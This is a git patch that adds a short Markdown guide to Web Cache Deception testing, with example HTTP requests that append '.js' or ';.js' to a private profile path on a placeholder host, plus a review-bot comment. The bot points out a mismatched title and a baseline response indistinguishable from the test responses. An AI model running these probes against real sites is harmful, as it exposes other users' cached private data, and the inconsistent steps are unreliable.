From bb8f0e7b1ef4e30a4fb28d88c8e446da49e9f765 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa Date: Sat, 3 Sep 2022 16:31:44 +0700 Subject: [PATCH] Added Web Cache Deception --- Web Cache Deception.md | 52 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 Web Cache Deception.md diff --git a/Web Cache Deception.md b/Web Cache Deception.md new file mode 100644 index 0000000..70c49a8 --- /dev/null +++ b/Web Cache Deception.md @@ -0,0 +1,52 @@ +# Web Cache Poisoning + +## Introduction +Web Cache Deception is an attack in which an attacker deceives a caching proxy into improperly storing private information sent over the internet and gaining unauthorized access to that cached data + +## Where to find +`-` + +## How to exploit +* Normal Request +``` +GET /profile/setting HTTP/1.1 +Host: www.vuln.com +``` +The response is +``` +HTTP/2 200 OK +Content-Type: text/html +Cf-Cache-Status: HIT +... +``` + +1. Try to add cacheable extension (For example .js / .css / .jpg, etc.) +``` +GET /profile/setting/.js HTTP/1.1 +Host: www.vuln.com +``` +The response is +``` +HTTP/2 200 OK +Content-Type: text/html +Cf-Cache-Status: HIT +... +``` +If the response is success, try to open the url in the incognito mode. + +2. Add `;` before the extension (For example `;.js` / `;.css` / `;.jpg`, etc.) +``` +GET /profile/setting/;.js HTTP/1.1 +Host: www.vuln.com +``` +The response is +``` +HTTP/2 200 OK +Content-Type: text/html +Cf-Cache-Status: HIT +... +``` +If the response is success, try to open the url in the incognito mode. + +## References +* [@bxmbn](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9) \ No newline at end of file
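Review bot: The title line `+# Web Cache Poisoning` does not match the file name `Web Cache Deception.md` or the Introduction, which defines Web Cache Deception; the heading should read `# Web Cache Deception`. In "How to exploit", the "Normal Request" response already shows `Cf-Cache-Status: HIT` and is identical to the responses in steps 1 and 2, so a reader cannot tell what separates the baseline from a response that was wrongly cached; show the baseline with the cache status actually observed and spell out what "If the response is success" means (which header value, and what the incognito request is expected to return). The requests are written as `HTTP/1.1` while every response is `HTTP/2 200 OK`, which should be made consistent. The "Where to find" section contains only `-` and should be filled in or dropped, and the file ends without a trailing newline.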